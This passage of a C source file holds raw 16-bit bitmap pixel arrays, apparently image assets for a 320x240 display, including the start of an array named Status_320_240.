0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76
};
const uint16_t Status_320_240[] = {0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xfffe, 0xfffe, 0xf7fe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffdf, 0xffdf, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffbf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffdf, 0xffff, 0xfffe, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffdf, 0xffde, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xffff, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xffdf, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 